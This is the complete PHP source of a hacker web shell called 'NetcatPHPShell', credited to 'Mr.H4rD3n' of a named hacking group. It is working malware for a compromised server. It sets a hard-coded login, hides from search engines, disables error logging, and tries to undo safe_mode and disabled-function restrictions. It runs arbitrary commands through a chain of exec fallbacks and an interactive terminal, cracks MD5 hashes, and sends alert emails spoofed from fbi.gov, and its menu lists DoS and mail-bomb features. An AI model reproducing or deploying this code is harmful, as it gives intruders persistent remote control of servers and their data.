<?php
/*
#############################################
# ––•(–•- NetcatPHPShell –•–)•–– #
# .::+ :Leech by K0eN: +::. #
# NetcatPHPShell ( Released on 9/16/12 ) #
# Email: K0eN@haxor.co #
#############################################
*/
error_reporting(0);
ini_set('max_execution_time',0);
// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\
/**************** Defines *********************************/
$greeting = "";
$user = "root";
$pass = "netcat";
$lock = "on"; // set this to off if you dont need the login page
$antiCrawler = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
$tracebackFeature = "off"; // set this feature to enable email alerts
$ownerEmail = "K0eN@haxor.co"; // Change this to your email , This email is used to deliver tracebacks about your shell
$url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$phpVersion=phpversion();
$self=$_SERVER["PHP_SELF"]; // Where am i
$sm = @ini_get('safe_mode');
$SEPARATOR = '/'; // Default Directory separator
$os = "N/D";
if(stristr(php_uname(),"Windows"))
{
$SEPARATOR = '\\';
$os = "Windows";
}
else if(stristr(php_uname(),"Linux"))
{
$os = "Linux";
}
//*************************************************************/
// -------------- Traceback Functions
function sendLoginAlert()
{
global $ownerEmail;
global $url;
$accesedIp = $_SERVER['REMOTE_ADDR'];
$randomInt = rand(0,1000000); # to avoid id blocking
$from = "ani-shell$randomInt@fbi.gov";
//echo $from;
if(function_exists('mail'))
{
$subject = "Shell Accessed -- Ani-Shell --";
$message = "
Hey Owner ,
Your Shell(Ani-Shell) located at $url was accessed by $accesedIp
If its not you :-
1. Please check if the shell is secured.
2. Change your user name and Password.
3. Check if lock is 0n!
and Kick that ****** out!
Thanking You
Yours Faithfully
Ani-Shell
";
mail($ownerEmail,$subject,$message,'From:'.$from);
}
}
//---------------------------------------------------------
if(function_exists('session_start') && $lock == 'on')
{
session_start();
}
else
{
// The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
$lock = 'off';
}
//logout
if(isset($_GET['logout']) && $lock == 'on')
{
$_SESSION['authenticated'] = 0;
session_destroy();
header("location: ".$_SERVER['PHP_SELF']);
}
ini_set('max_execution_time',0);
/***************** Restoring *******************************/
ini_restore("safe_mode_include_dir");
ini_restore("safe_mode_exec_dir");
ini_restore("disable_functions");
ini_restore("allow_url_fopen");
ini_restore("safe_mode");
ini_restore("open_basedir");
if(function_exists('ini_set'))
{
ini_set('error_log',NULL); // No alarming logs
ini_set('log_errors',0); // No logging of errors
ini_set('file_uploads',1); // Enable file uploads
ini_set('allow_url_fopen',1); // allow url fopen
}
else
{
ini_alter('error_log',NULL);
ini_alter('log_errors',0);
ini_alter('file_uploads',1);
ini_alter('allow_url_fopen',1);
}
// ----------------------------------------------------------------------------------------------------------------
?>
<html>
<head>
<title>––•(–•- NetcatPHPShell –•–)•–– | | Made by Mr.H4rD3n</title>
<?php
if($antiCrawler != 'off')
{
?>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<?php
}
?>
<style>
/*
==========================
CSS Section
==========================
*/
*{
padding:0;
margin:0;
}
.alert
{
background:red;
color:white;
font-weight:bold;
}
td.info
{
width:0px;
}
.bind
{
border: 1px solid #333333;
margin: 15px auto 0;
font-size: small;
}
div.end *
{
font-size:small;
}
div.end
{
width:100%;
background:#529ADE;
}
p.blink
{
text-decoration: blink;
}
body
{
background-color:black;
color:rgb(35,182,39);
font-family:Tahoma,Verdana,Arial;
font-size: small;
}
input.own {
background-color: Green;
color: white;
border : 1px solid #529ADE;
}
blockquote.small
{
font-size: smaller;
color: silver;
text-align: center;
}
table.files
{
border-spacing: 10px;
font-size: small;
}
h1 {
padding: 4px;
padding-bottom: 0px;
margin-right : 5px;
}
div.logo
{
border-right: 1px aqua solid;
}
div.header
{
padding-left: 5px;
font-size: small;
text-align: left;
}
div.nav
{
margin-top:1px;
height:30px;
background-color: #529ADE;
}
div.nav ul
{
list-style: none;
padding: 4px;
}
div.nav li
{
float: left;
margin-right: 10px;
text-align:center;
}
textarea.cmd
{
border : 1px solid #111;
background-color : green;
font-family: Shell;
color : white;
margin-top: 10px;
font-size:small;
}
input.cmd
{
background-color:black;
color: white;
width: 400px;
border : 1px solid #529ADE;
}
td.maintext
{
font-size: large;
}
#margins
{
margin-left: 10px;
margin-top: 10px;
color:white;
}
table.top
{
border-bottom: 1px solid aqua;
width: 100%;
}
#borders
{
border-top : 1px solid aqua;
border-left:1px solid aqua;
border-bottom: 1px solid aqua;
border-right: 1px solid aqua;
margin-bottom:0;
}
td.file a , .file a
{
color : aqua;
text-decoration:none;
}
a.dir
{
color:white;
font-weight:bold;
text-decoration:none;
}
td.dir a
{
color : white;
text-decoration:none;
}
td.download,td.download2
{
color:green;
}
#spacing
{
padding:10px;
margin-left:200px;
}
th.header
{
background: none repeat scroll 0 0 #191919;
color: white;
border-bottom : 1px solid #333333;
}
p.warning
{
background : red;
color: white;
}
/*
--------------------------------CSS END------------------------------------------------------
*/
</style>
</head>
<body text="rgb(39,245,10)" bgcolor="black" style="background-color:#000000">
<?php
if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
{
if( $_POST['user'] == $user &&
$_POST['pass'] == $pass )
{
$_SESSION['authenticated'] = 1;
// --------------------- Tracebacks --------------------------------
if($tracebackFeature == 'On')
{
sendLoginAlert();
}
// ------------------------------------------------------------------
}
}
if($lock == 'off')
{?>
<p class="warning"><font color="#FF0000"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
<?php
}
if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
{
?>
<table height="421" width="993">
<tbody>
<tr>
<td width="448">
<pre>
<font color="Orange">
<b>
</b></font><b><font color="#19D2FE">[]======================================[]
[]-----------</font><font color="#FFFFFF">NetcatPHPShell</font><font color="#19D2FE">-------------[]
[]---------------</font><font color="#CC6600">Private</font><font color="#19D2FE">----------------[]
[]======================================[]
[] </font><font color="#FFFFFF">–</font><font color="#19D2FE">–</font><font color="#FF0000">•(</font><font color="#19D2FE">-• c0d3d by Mr.H4rD3n •-</font><font color="#FF0000">)•</font><font color="#19D2FE">–</font><font color="#FFFFFF">–</font><font color="#19D2FE"> []</font></b></pre>
<pre>
<b><font color="#19D2FE">[]======================================[]
[] NetcatPHPShell Released on </font><font color="#FFFFFF">11/04/12</font><font color="#19D2FE"> []</font></b></pre>
<pre>
<b><font color="#19D2FE">[]======================================[]
[] </font><font color="#CC6600">WeLcOmE Master Of The Server !</font><font color="#19D2FE"> []
[]======================================[]</font></b></pre>
<pre><b><font color="#19D2FE">[] Moroccan </font><font color="#FFFFFF">Hackers</font><font color="#19D2FE"> []
[] </font><font color="#FFFFFF">Moroccan</font><font color="#19D2FE"> C0d3r []</font></b></pre>
<pre><b><font color="#19D2FE">[] Moroccan </font><font color="#FFFFFF">Masters </font><font color="#19D2FE">[]</font></b></pre>
<pre><b><font color="#19D2FE">[]======================================[]
[] </font><font color="#CC6600">MaD </font><font color="#FFFFFF">In</font><font color="#CC6600"> </font><font color="#19D2FE">MoRoCcO []</font></b></pre>
<pre><b><font color="#19D2FE">[]======================================[]
[] []
[] </font><font color="#CC6600">Netcat</font><font color="#19D2FE"> </font><font color="#FFFFFF">PHP Connect to Server</font><font color="#19D2FE"> []</font></b></pre>
<pre><b><font color="#19D2FE">[] []
[]======================================[]
[] </font><font color="#CC6600">My Groupe</font><font color="#19D2FE"> </font><font color="#FFFFFF">IsLamiC Warrior Team</font><font color="#19D2FE"> []
[]======================================[]
[] </font><font color="#FF0000"> </font><font color="#CC6600">Email:</font><font color="#19D2FE"> </font><font color="#FFFFFF">exploit-id@hotmail.com</font><font color="#19D2FE"> []
[] </font><font color="#CC6600"> Facebook :</font><font color="#19D2FE"> </font><font color="#FFFFFF">Facebook.com/Mr.H4rD3n</font> <font color="#19D2FE">[]
[]</font><font color="#19D2FE">======================================[]</font><font color="grey">
</font></b><font color="grey">
</pre>
</td>
<td>
<h1><?php echo $greeting;?></h1>
<img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><br /><br />
<form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
<input name="user" value="UserNamE" style="color: #19D2FE; background-color: #000000" size="20"/>
<input name="pass" type="password" value="passwd" style="color: #19D2FE; background-color: #000000" size="20"/>
<input class="own" type="submit" value="GO TO HeLL" style="color: #42CFF9; background-color: #000000"/>
</form>
</td>
</tr>
</tbody>
</table>
<?php
}
//---------------------------------- We are authenticated now-------------------------------------
//Launch the shell
else
{
//---------------------------------- Fuctions ---------------------------------------------------
function showDrives()
{
global $self;
foreach(range('A','Z') as $drive)
{
if(is_dir($drive.':\\'))
{
?>
<a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
<?php echo $drive.":\\" ?>
</a>
<?php
}
}
}
function HumanReadableFilesize($size)
{
$mod = 1024;
$units = explode(' ','B KB MB GB TB PB');
for ($i = 0; $size > $mod; $i++)
{
$size /= $mod;
}
return round($size, 2) . ' ' . $units[$i];
}
function getClientIp()
{
echo $_SERVER['REMOTE_ADDR'];
}
function getServerIp()
{
echo getenv('SERVER_ADDR');
}
function getSoftwareInfo()
{
echo php_uname();
}
function diskSpace()
{
echo HumanReadableFilesize(disk_total_space("/"));
}
function freeSpace()
{
echo HumanReadableFilesize(disk_free_space("/"));
}
function getSafeMode()
{
global $sm;
echo($sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF");
}
function getDisabledFunctions()
{
if(!ini_get('disable_functions'))
{
echo "None";
}
else
{
echo @ini_get('disable_functions');
}
}
function getFilePermissions($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
/***********************************************************/
// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
// Turned OfF!
/**********************************************************/
function exec_all($command)
{
$output = '';
if(function_exists('exec'))
{
exec($command,$output);
$output = join("\n",$output);
}
else if(function_exists('shell_exec'))
{
$output = shell_exec($command);
}
else if(function_exists('popen'))
{
$handle = popen($command , "r"); // Open the command pipe for reading
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($handle))
{
$output .= fread($handle, 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($handle))
{
$output .= fgets($handle,512);
}
}
}
pclose($handle);
}
else if(function_exists('system'))
{
ob_start(); //start output buffering
system($command);
$output = ob_get_contents(); // Get the ouput
ob_end_clean(); // Stop output buffering
}
else if(function_exists('passthru'))
{
ob_start(); //start output buffering
passthru($command);
$output = ob_get_contents(); // Get the ouput
ob_end_clean(); // Stop output buffering
}
else if(function_exists('proc_open'))
{
$descriptorspec = array(
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
);
$handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
if(is_resource($handle))
{
if(function_exists('fread') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$output .= fread($pipes[1], 512);
}
}
else if(function_exists('fgets') && function_exists('feof'))
{
while(!feof($pipes[1]))
{
$output .= fgets($pipes[1],512);
}
}
}
pclose($handle);
}
else
{
$output = "They have their Security there! :( ";
}
return(htmlspecialchars($output));
}
function magicQuote($text)
{
if (!get_magic_quotes_gpc())
{
return $text;
}
return stripslashes($text);
}
function md5Crack($hash , $list)
{
$fd = fopen($list,"r");
if( strlen($hash) != 32 || $fd == FALSE)
{
// echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
return "<p class='warning'>Hash or List invalid!</p>";
}
else
{
$pwdList = fread($fd,512);
$pwdList = explode("\n",$pwdList);
echo "Words Checked :-<br /><br />\n";
foreach($pwdList as $pwd)
{
$pwd = trim($pwd);
echo "<br />[*] ".$pwd;
if(md5($pwd) == $hash )
{
return "<br /><br /><br />\n<h2>Hash Cracked</h2><br /><br />\n<p class='warning'>Planintext : $pwd</p>";
}
}
}
}
//------------------------------------------------------------------------------------------------
?>
<div class="nav" style="width: 1005px; height: 49px">
<ul>
<li><a href="<?php echo $self;?>"></a></li>
<li><a href="<?php echo $self.'?upload';?>"></a></li>
<li><a href="<?php echo $self.'?shell';?>"></a></li>
<li><a href="<?php echo $self.'?dos';?>"></a></li>
<li><a href="<?php echo $self.'?fuzz';?>"></a></li>
<li><a href="<?php echo $self.'?mail'?>"></a></li>
<li><a href="<?php echo $self.'?bomb'?>"></a></li>
<li><a href="<?php echo $self.'?connect'?>"></a></li>
<li><a href="<?php echo $self.'?injector'?>"></a></li>
<li><a href="<?php echo $self.'?decode'?>"></a></li>
<li><a href="<?php echo $self.'?eval'?>"></a></li>
<li><a href="<?php echo $self.'?md5'?>"></a></li>
<?php if($lock == 'on')
{
?>
<li> <font face="Times New Roman" size="4"> </font><font face="Times New Roman" size="5">
</font>
<i><font face="Verdana" size="5">
<a href="<?php echo $self.'?logout'?>">
<font color="#FFFFFF"><span style="text-decoration: none">Logout</span></font></a></font></i><font color="#FF0000"><b><i><font face="Verdana" size="5"></li></font></i><font face="Verdana" size="5"> </font>
</b><font face="Times New Roman" size="5">
<?php
}
?>
</font>
</font>
</ul>
</div>
<?php
//-------------------------------- Check what he wants -------------------------------------------
// Shell
if(isset($_GET['shell']))
{
if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
{
$result = "";
}
else
{
$result=exec_all($_GET['cmd']);
}
?>
<?php
}
//Rename
else if(isset($_GET['rename']))
{
if(isset($_GET['to']) && isset($_GET['rename']))
{
if(rename($_GET['rename'],$_GET['to']) == FALSE)
{
?>
<?php
}
}
else
{
?>
<?php
}
}
// No request made
// Display home page
else
{
$dir = getcwd();
if(isset($_GET['dir']))
{
$dir = $_GET['dir'];
}
?>
<p> </p>
<?php
$aliases = array('la' => 'ls -la',
'll' => 'ls -lvhF',
'dir' => 'ls' );
$passwd = array('' => '');
error_reporting(0);
class phpTerm {
function formatPrompt() {
$user=shell_exec("whoami");
$host=explode(".", shell_exec("uname -n"));
$_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
}
function checkPassword($passwd) {
if(!isset($_SERVER['PHP_AUTH_USER'])||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
@session_start();
return true;
}
else {
@session_start();
return true;
}
}
function initVars()
{
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
{
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
$_REQUEST['command'] ='';
}
}
function buildCommandHistory()
{
if(!empty($_REQUEST['command']))
{
if(get_magic_quotes_gpc())
{
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
// drop old commands from list if exists
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
{
unset($_SESSION['history'][$i]);
}
array_unshift($_SESSION['history'], $_REQUEST['command']);
// append commmand */
$_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
}
}
function buildJavaHistory()
{
// build command history for use in the JavaScript
if (empty($_SESSION['history']))
{
$_SESSION['js_command_hist'] = '""';
}
else
{
$escaped = array_map('addslashes', $_SESSION['history']);
$_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
}
}
function outputHandle($aliases)
{
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
{
$_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
}
elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
{
// The current command is 'cd', which we have to handle as an internal shell command.
// absolute/relative path ?"
($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
// cosmetics
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if(empty($new_dir)): $new_dir = "/"; endif;
(@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
}
else
{
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
/* Alias expansion. */
$length = strcspn($_REQUEST['command'], " \t");
$token = substr(@$_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open(@$_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
} // end phpTerm
/*##########################################################
## The main thing starts here
## All output ist XHTML
##########################################################*/
$terminal=new phpTerm;
@session_start();
$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>.:: --+ NeTCaTPHPShell +-- ::.</title>
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
<style type="text/css">
body {font-family: sans-serif; color: black; background: white;}
table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
</style>
</head>
<body onload="init()" style="background-color:#000000">
nd )'<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>
<div align="center">
<img alt="http://img4.imageshack.us/img4/3096/piccat.gif" src="http://img4.imageshack.us/img4/3096/piccat.gif"><p>
<font color="#FFFFFF">
-------------------------------------------------------------------------------------</font></p>
<p><font face="Times New Roman" color="#529ADE" size="4">–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font><font color="#FF0000" face="Times New Roman" size="4">–•</font><font size="4"><font color="#42CFF9" face="Times New Roman">(</font><font color="#FF0000" face="Times New Roman">-</font><font color="#27F50A" face="Times New Roman">•</font><b><font color="#529ADE" face="Times New Roman">
© Copyright </font><font color="#FF0000" face="Times New Roman">Mr.H4rD3n</font><font color="#529ADE" face="Times New Roman">
</font><font color="#FFFF00" face="Times New Roman">[ </font><font color="#529ADE" face="Times New Roman">All
rights reserved </font><font color="#FFFF00" face="Times New Roman">]</font><font color="#529ADE" face="Times New Roman">
</font><font color="#27F50A" face="Times New Roman">•</font><font color="#FF0000" face="Times New Roman">-</font><font color="#42CFF9" face="Times New Roman">)</font></b></font><b><font color="#FF0000" face="Times New Roman" size="4">•–</font><font color="#FFFFFF" face="Times New Roman" size="4">–</font></b></p>
<p>
<font color="#FFFFFF">
-------------------------------------------------------------------------------------</font></p>
<p><font face="Comic Sans MS" color="#42CFF9">Get Commands to Server - Bypass</font></p>
<table cellpadding="0" cellspacing="0">
<tr><td class="head" style="color: #000000;"><font color="#FFFFFF"><b>X</b></font></td>
<td class="head"><font color="#FFFFFF"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
</font>
</td></tr>
<tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
<textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
<input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
</p>
<? /*<p>
<input type="submit" value="Execute Command" />
<input type="submit" name="reset" value="Reset" />
Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
</p>
*/
?>
</form></td></tr>
</body>
</html>
<?php ?>
<?php
$aliases = array('la' => 'ls -la',
'll' => 'ls -lvhF',
'dir' => 'ls' );
$passwd = array('' => '');
error_reporting(1);
class phpTerm {
function formatPrompt() {
$user=shell_exec("whoami");
$host=explode(".", shell_exec("uname -n"));
$_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0])."";
}
function checkPassword($passwd) {
if(!isset($_SERVER['PHP_AUTH_USER'])||
!isset($_SERVER['PHP_AUTH_PW']) ||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
@session_start();
return true;
}
else {
@session_start();
return true;
}
}
function initVars()
{
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
{
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
$_REQUEST['command'] ='';
}
}
function buildCommandHistory()
{
if(!empty($_REQUEST['command']))
{
if(get_magic_quotes_gpc())
{
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
// drop old commands from list if exists
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
{
unset($_SESSION['history'][$i]);
}
array_unshift($_SESSION['history'], $_REQUEST['command']);
// append commmand */
$_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n";
}
}
function buildJavaHistory()
{
// build command history for use in the JavaScript
if (empty($_SESSION['history']))
{
$_SESSION['js_command_hist'] = '""';
}
else
{
$escaped = array_map('addslashes', $_SESSION['history']);
$_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
}
}
function outputHandle($aliases)
{
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command']))
{
$_SESSION['cwd'] = getcwd(); //dirname(__FILE__);
}
elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs))
{
// The current command is 'cd', which we have to handle as an internal shell command.
// absolute/relative path ?"
($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
// cosmetics
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if(empty($new_dir)): $new_dir = "/"; endif;
(@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n";
}
else
{
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
/* Alias expansion. */
$length = strcspn($_REQUEST['command'], " \t");
$token = substr(@$_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open(@$_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
} // end phpTerm
/*##########################################################
## The main thing starts here
## All output ist XHTML
##########################################################*/
$terminal=new phpTerm;
@session_start();
$terminal->initVars();
$terminal->buildCommandHistory();
$terminal->buildJavaHistory();
if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
$terminal->outputHandle($aliases);
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
/*##########################################################
## safe mode increase
## bloque fonction
##########################################################*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>\-( CMD Command )-/</title>
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
<style type="text/css">
body {font-family: sans-serif; color: black; background: white;}
table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
</style>
</head>
<body onload="init()" style="background-color:#000000">
<h2>POwER CoMMaNdE</h2>
<?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>
</div>
<div align="center">
<table cellpadding="0" cellspacing="0">
<tr><td class="head" style="color: #000000;"><b>PWD :</b></td>
<td class="head"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
</td></tr>
<tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
<textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
<input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
</p>
<? /*<p>
<input type="submit" value="Execute Command" />
<input type="submit" name="reset" value="Reset" />
Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
</p>
*/?>
</form></td></tr>
</div>
</table>
</div>
</body>
</html>
<?php ?><html><head><title>#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team</title></head><body bgcolor="BLACK" background="http://localhost/a/matrix-animated-image.gif" style="background-color:#000000"></body></html></html><?php
}
//------------------------------------------------------------------------------------------------
?>
<?php
}
// End Shell
//-------------------------------------------------------------------------------------------------
?>
<br /><br /><br /><font color="#23B627"><br />
</font>
<div class="end">
<p align="center"><font color="#FFFFFF"><b>––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––</b><br />
